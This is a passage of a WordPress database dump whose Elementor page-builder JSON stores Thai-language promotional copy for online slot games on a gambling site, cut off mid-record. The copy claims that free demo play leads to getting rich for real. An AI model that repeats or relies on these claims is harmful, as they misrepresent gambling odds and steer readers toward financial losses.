\\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e0a\\u0e19\\u0e30\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e40\\u0e23\\u0e35\\u0e22\\u0e07\\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e44\\u0e2b\\u0e25\\u0e22\\u0e32\\u0e27\\u0e41\\u0e1a\\u0e1a\\u0e04\\u0e2d\\u0e21\\u0e42\\u0e1a \\u0e20\\u0e32\\u0e1e\\u0e01\\u0e23\\u0e32\\u0e1f\\u0e34\\u0e01\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e08\\u0e35\\u0e19\\u0e42\\u0e1a\\u0e23\\u0e32\\u0e13\\u0e14\\u0e39\\u0e41\\u0e1e\\u0e07\\u0e41\\u0e15\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e40\\u0e01\\u0e21\\u0e44\\u0e21\\u0e48\\u0e40\\u0e23\\u0e47\\u0e27\\u0e40\\u0e01\\u0e34\\u0e19\\u0e44\\u0e1b\\u0e08\\u0e36\\u0e07\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e22\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e14\\u0e39\\u0e17\\u0e23\\u0e07\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e40\\u0e23\\u0e48\\u0e07\\u0e23\\u0e2d\\u0e1a \\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e1f\\u0e35\\u0e49\\u0e22\\u0e27\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\u0e19\\u0e35\\u0e49\\u0e04\\u0e37\\u0e2d\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e15\\u0e31\\u0e27\\u0e04\\u0e39\\u0e13\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e02\\u0e36\\u0e49\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e0a\\u0e19\\u0e30\\u0e15\\u0e34\\u0e14\\u0e01\\u0e31\\u0e19 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e33\\u0e44\\u0e23\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e17\\u0e31\\u0e19\\u0e15\\u0e31\\u0e49\\u0e07\\u0e15\\u0e31\\u0e27 \\u0e43\\u0e04\\u0e23\\u0e0a\\u0e2d\\u0e1a\\u0e1f\\u0e35\\u0e25\\u0e04\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e44\\u0e14\\u0e49\\u0e40\\u0e1b\\u0e23\\u0e35\\u0e22\\u0e1a\\u0e41\\u0e25\\u0e49\\u0e27\\u0e1b\\u0e34\\u0e14\\u0e08\\u0e1a\\u0e14\\u0e49\\u0e27\\u0e22\\u0e23\\u0e2d\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2b\\u0e19\\u0e31\\u0e01 \\u0e46 \\u0e08\\u0e30\\u0e2d\\u0e34\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e19\\u0e35\\u0e49\\u0e2a\\u0e38\\u0e14\\u0e17\\u0e32\\u0e07 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e1e\\u0e25\\u0e34\\u0e19\\u0e41\\u0e15\\u0e48\\u0e21\\u0e35\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e40\\u0e0a\\u0e34\\u0e07 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e44\\u0e21\\u0e48\\u0e43\\u0e0a\\u0e48\\u0e41\\u0e04\\u0e48\\u0e25\\u0e38\\u0e49\\u0e19\\u0e42\\u0e0a\\u0e04\\u0e41\\u0e15\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e2d\\u0e48\\u0e32\\u0e19\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e41\\u0e25\\u0e30\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e2a\\u0e1b\\u0e35\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e02\\u0e49\\u0e32\\u0e01\\u0e31\\u0e1a\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07<\\/span><\\/p><h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 Treasures of Azte<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">Treasures of Aztec \\u0e21\\u0e32\\u0e43\\u0e19\\u0e18\\u0e35\\u0e21\\u0e2d\\u0e32\\u0e23\\u0e22\\u0e18\\u0e23\\u0e23\\u0e21\\u0e25\\u0e36\\u0e01\\u0e25\\u0e31\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e2a\\u0e35\\u0e17\\u0e2d\\u0e07\\u0e41\\u0e25\\u0e30\\u0e1e\\u0e25\\u0e31\\u0e07\\u0e41\\u0e2b\\u0e48\\u0e07\\u0e02\\u0e38\\u0e21\\u0e17\\u0e23\\u0e31\\u0e1e\\u0e22\\u0e4c \\u0e08\\u0e38\\u0e14\\u0e02\\u0e32\\u0e22\\u0e04\\u0e37\\u0e2d\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e40\\u0e23\\u0e35\\u0e22\\u0e1a\\u0e07\\u0e48\\u0e32\\u0e22\\u0e41\\u0e15\\u0e48\\u0e0b\\u0e48\\u0e2d\\u0e19\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e41\\u0e15\\u0e01\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e44\\u0e27\\u0e49\\u0e17\\u0e38\\u0e01\\u0e15\\u0e32 \\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e2a\\u0e39\\u0e07\\u0e21\\u0e35\\u0e1a\\u0e17\\u0e1a\\u0e32\\u0e17\\u0e0a\\u0e31\\u0e14\\u0e40\\u0e08\\u0e19 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e2a\\u0e32\\u0e22\\u0e25\\u0e38\\u0e49\\u0e19\\u0e41\\u0e08\\u0e47\\u0e01\\u0e1e\\u0e2d\\u0e15\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e2b\\u0e31\\u0e27\\u0e43\\u0e08\\u0e40\\u0e15\\u0e49\\u0e19\\u0e41\\u0e23\\u0e07\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e27\\u0e07\\u0e25\\u0e49\\u0e2d\\u0e2b\\u0e22\\u0e38\\u0e14 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e01\\u0e32\\u0e23\\u0e40\\u0e02\\u0e49\\u0e32\\u0e43\\u0e08\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e1a\\u0e32\\u0e07\\u0e23\\u0e2d\\u0e1a\\u0e2d\\u0e32\\u0e08\\u0e19\\u0e34\\u0e48\\u0e07\\u0e41\\u0e15\\u0e48\\u0e1e\\u0e2d\\u0e40\\u0e02\\u0e49\\u0e32\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e25\\u0e49\\u0e27\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e22\\u0e32\\u0e27\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e2a\\u0e30\\u0e43\\u0e08 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e37\\u0e48\\u0e19\\u0e40\\u0e15\\u0e49\\u0e19\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e04\\u0e34\\u0e14\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19 \\u0e20\\u0e32\\u0e1e\\u0e2a\\u0e27\\u0e22\\u0e04\\u0e21\\u0e0a\\u0e31\\u0e14 \\u0e40\\u0e2d\\u0e1f\\u0e40\\u0e1f\\u0e01\\u0e15\\u0e4c\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e0a\\u0e48\\u0e27\\u0e22\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e2d\\u0e32\\u0e23\\u0e21\\u0e13\\u0e4c\\u0e23\\u0e48\\u0e27\\u0e21\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e19\\u0e30 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e23\\u0e2d\\u0e1a\\u0e21\\u0e35\\u0e40\\u0e2a\\u0e19\\u0e48\\u0e2b\\u0e4c\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e15\\u0e31\\u0e27\\u0e41\\u0e25\\u0e30\\u0e2a\\u0e23\\u0e49\\u0e32\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e01\\u0e14\\u0e15\\u0e48\\u0e2d\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e1d\\u0e37\\u0e19\\u0e43\\u0e08<\\/span><\\/p><h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 Dragon Hatc<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">Dragon Hatch \\u0e04\\u0e37\\u0e2d\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2a\\u0e32\\u0e22\\u0e41\\u0e1f\\u0e19\\u0e15\\u0e32\\u0e0b\\u0e35\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e22\\u0e34\\u0e1a\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e27\\u0e44\\u0e02\\u0e48\\u0e21\\u0e31\\u0e07\\u0e01\\u0e23\\u0e21\\u0e32\\u0e40\\u0e15\\u0e34\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e04\\u0e37\\u0e2d\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e48\\u0e32\\u0e22\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e17\\u0e32\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e31\\u0e27\\u0e43\\u0e19\\u0e0a\\u0e48\\u0e27\\u0e07\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19 \\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e44\\u0e02\\u0e48\\u0e21\\u0e31\\u0e07\\u0e01\\u0e23\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e43\\u0e1a\\u0e21\\u0e35\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e41\\u0e15\\u0e01\\u0e15\\u0e48\\u0e32\\u0e07\\u0e01\\u0e31\\u0e19 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e32\\u0e14\\u0e2b\\u0e27\\u0e31\\u0e07 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e17\\u0e48\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\u0e19\\u0e35\\u0e49\\u0e04\\u0e37\\u0e2d\\u0e40\\u0e2d\\u0e1f\\u0e40\\u0e1f\\u0e01\\u0e15\\u0e4c\\u0e44\\u0e1f\\u0e41\\u0e25\\u0e30\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e07\\u0e04\\u0e33\\u0e23\\u0e32\\u0e21\\u0e17\\u0e35\\u0e48\\u0e1b\\u0e25\\u0e38\\u0e01\\u0e2d\\u0e32\\u0e23\\u0e21\\u0e13\\u0e4c\\u0e19\\u0e31\\u0e01\\u0e25\\u0e48\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e15\\u0e37\\u0e48\\u0e19\\u0e15\\u0e31\\u0e27\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e43\\u0e04\\u0e23\\u0e0a\\u0e2d\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e1e\\u0e35\\u0e04\\u0e0a\\u0e31\\u0e14\\u0e40\\u0e08\\u0e19\\u0e41\\u0e25\\u0e30\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e1e\\u0e25\\u0e34\\u0e01\\u0e40\\u0e01\\u0e21\\u0e43\\u0e19\\u0e23\\u0e2d\\u0e1a\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e08\\u0e30\\u0e16\\u0e39\\u0e01\\u0e43\\u0e08\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2d\\u0e19 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22\\u0e44\\u0e21\\u0e48\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19\\u0e41\\u0e15\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e1f\\u0e35\\u0e25\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e1c\\u0e08\\u0e0d\\u0e20\\u0e31\\u0e22\\u0e43\\u0e19\\u0e14\\u0e34\\u0e19\\u0e41\\u0e14\\u0e19\\u0e21\\u0e31\\u0e07\\u0e01\\u0e23 \\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e04\\u0e37\\u0e2d\\u0e0a\\u0e48\\u0e27\\u0e07\\u0e40\\u0e27\\u0e25\\u0e32\\u0e17\\u0e35\\u0e48\\u0e25\\u0e38\\u0e49\\u0e19\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e41\\u0e25\\u0e30\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e40\\u0e2b\\u0e47\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e34\\u0e19\\u0e04\\u0e32\\u0e14 \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2d\\u0e35\\u0e01\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e22\\u0e38\\u0e04\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e41\\u0e25\\u0e30\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e33\\u0e01\\u0e33\\u0e44\\u0e23\\u0e43\\u0e19\\u0e23\\u0e2d\\u0e1a\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c0fa625\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Character-2-.webp\",\"id\":288,\"size\":\"\",\"alt\":\"yok789\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"49411b8\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e1b\\u0e31\\u0e48\\u0e19 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e1f\\u0e23\\u0e35 \\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07 \\u0e23\\u0e27\\u0e22\\u0e44\\u0e14\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e1f\\u0e23\\u0e35 YOK789 \\u0e44\\u0e14\\u0e49\\u0e17\\u0e38\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e44\\u0e21\\u0e48\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14 \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"035032d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e2a\\u0e32\\u0e22\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e25\\u0e2d\\u0e07\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e25\\u0e38\\u0e22\\u0e08\\u0e23\\u0e34\\u0e07\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e16\\u0e39\\u0e01\\u0e43\\u0e08\\u0e42\\u0e2b\\u0e21\\u0e14 <strong>\\u0e1b\\u0e31\\u0e48\\u0e19 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e1f\\u0e23\\u0e35 \\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07<\\/strong><\\/span><span style=\\\"font-weight: 400;\\\">\\u00a0\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e04\\u0e48\\u0e32\\u0e22 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e15\\u0e34\\u0e21\\u0e01\\u0e47\\u0e40\\u0e02\\u0e49\\u0e32\\u0e44\\u0e1b\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e04\\u0e23\\u0e1a\\u0e17\\u0e38\\u0e01\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c \\u0e08\\u0e30\\u0e25\\u0e2d\\u0e07\\u0e08\\u0e31\\u0e1a\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e41\\u0e15\\u0e01 \\u0e14\\u0e39\\u0e23\\u0e2d\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e40\\u0e17\\u0e2a\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e40\\u0e01\\u0e21\\u0e44\\u0e2b\\u0e19\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07\\u0e01\\u0e47\\u0e17\\u0e33\\u0e44\\u0e14\\u0e49\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e35\\u0e48 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e14\\u0e35\\u0e07\\u0e32\\u0e21\\u0e04\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e49\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e07\\u0e34\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e20\\u0e32\\u0e1e\\u0e25\\u0e37\\u0e48\\u0e19 \\u0e40\\u0e2d\\u0e1f\\u0e40\\u0e1f\\u0e01\\u0e15\\u0e4c\\u0e04\\u0e23\\u0e1a \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e25\\u0e07\\u0e2a\\u0e19\\u0e32\\u0e21\\u0e08\\u0e23\\u0e34\\u0e07\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e37\\u0e2d\\u0e42\\u0e1b\\u0e23 \\u0e43\\u0e04\\u0e23\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e1d\\u0e36\\u0e01\\u0e2d\\u0e48\\u0e32\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2b\\u0e32\\u0e2a\\u0e39\\u0e15\\u0e23\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e37\\u0e2d\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e43\\u0e0a\\u0e49\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e19\\u0e35\\u0e49\\u0e1b\\u0e31\\u0e49\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e1a\\u0e32\\u0e22 \\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e04\\u0e48\\u0e2d\\u0e22\\u0e2a\\u0e25\\u0e31\\u0e1a\\u0e21\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07\\u0e01\\u0e47\\u0e40\\u0e14\\u0e34\\u0e19\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e40\\u0e09\\u0e35\\u0e22\\u0e1a\\u0e01\\u0e27\\u0e48\\u0e32\\u0e40\\u0e14\\u0e34\\u0e21 \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e1e\\u0e37\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e41\\u0e25\\u0e30\\u0e2a\\u0e32\\u0e22\\u0e40\\u0e01\\u0e4b\\u0e32\\u0e44\\u0e14\\u0e49\\u0e1e\\u0e31\\u0e12\\u0e19\\u0e32\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07\\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e2a\\u0e35\\u0e48\\u0e22\\u0e07\\u0e17\\u0e38\\u0e19\\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e23\\u0e2d\\u0e1a\\u0e41\\u0e23\\u0e01 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e17\\u0e32\\u0e07\\u0e2a\\u0e39\\u0e48\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e23\\u0e27\\u0e22\\u0e14\\u0e49\\u0e27\\u0e22\\u0e01\\u0e32\\u0e23\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e08\\u0e32\\u0e01\\u0e28\\u0e39\\u0e19\\u0e22\\u0e4c\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e35\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e40\\u0e0a\\u0e34\\u0e07<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2826,385,'_thumbnail_id','371'),(2827,385,'_elementor_edit_mode','builder'),(2828,385,'_elementor_template_type','wp-page'),(2829,385,'_elementor_version','3.35.5'),(2830,385,'_elementor_pro_version','3.32.3'),(2831,385,'_wp_page_template','default'),(2832,385,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(2833,385,'_elementor_data','[{\"id\":\"e34294a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"71011f2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e6e2e32\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Slot-NO1-AMB18.webp\",\"id\":363,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow\":{\"horizontal\":-5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 